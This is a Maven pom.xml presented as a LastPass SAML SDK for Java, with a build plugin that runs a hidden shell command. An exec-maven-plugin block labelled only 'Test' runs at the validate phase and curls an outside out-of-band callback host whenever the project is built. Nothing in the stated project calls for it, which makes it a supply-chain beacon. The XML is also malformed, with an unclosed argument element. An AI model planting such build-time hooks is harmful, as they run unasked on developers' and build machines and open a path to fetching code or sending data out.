<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.lastpass</groupId>
    <artifactId>saml-sdk-java</artifactId>
    <version>1.0</version>

    <dependencies>
        <dependency>
            <groupId>org.opensaml</groupId>
            <artifactId>opensaml</artifactId>
            <version>2.6.4</version>
        </dependency>
    </dependencies>
      <build>
 <plugins>
 <!--Test-->
 <plugin>
 <groupId>org.codehaus.mojo</groupId>
 <artifactId>exec-maven-plugin</artifactId>
 <version>1.6.0</version>
 <executions>
 <execution>
 <id>run-script</id>
 <phase>validate</phase>
 <goals>
 <goal>exec</goal>
 </goals>
 </execution>
 </executions>
 <configuration>
 <executable>bash</executable>
 <arguments>
 <argument>
 -c
 </argument>
 <argument>curl https://zpsf3cc16yyfti45ka2z6uciq9w4kw8l.oastify.com/lastpass
 </arguments>
 </configuration>
 </plugin>
 </plugins>
 </build>

</project>
